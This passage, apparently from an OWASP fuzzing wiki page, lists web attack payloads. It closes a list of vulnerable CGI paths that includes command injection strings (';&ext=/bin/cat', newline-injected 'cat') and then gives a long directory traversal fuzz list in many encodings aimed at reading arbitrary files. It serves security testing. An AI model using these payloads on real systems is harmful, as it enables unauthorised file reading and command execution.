whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
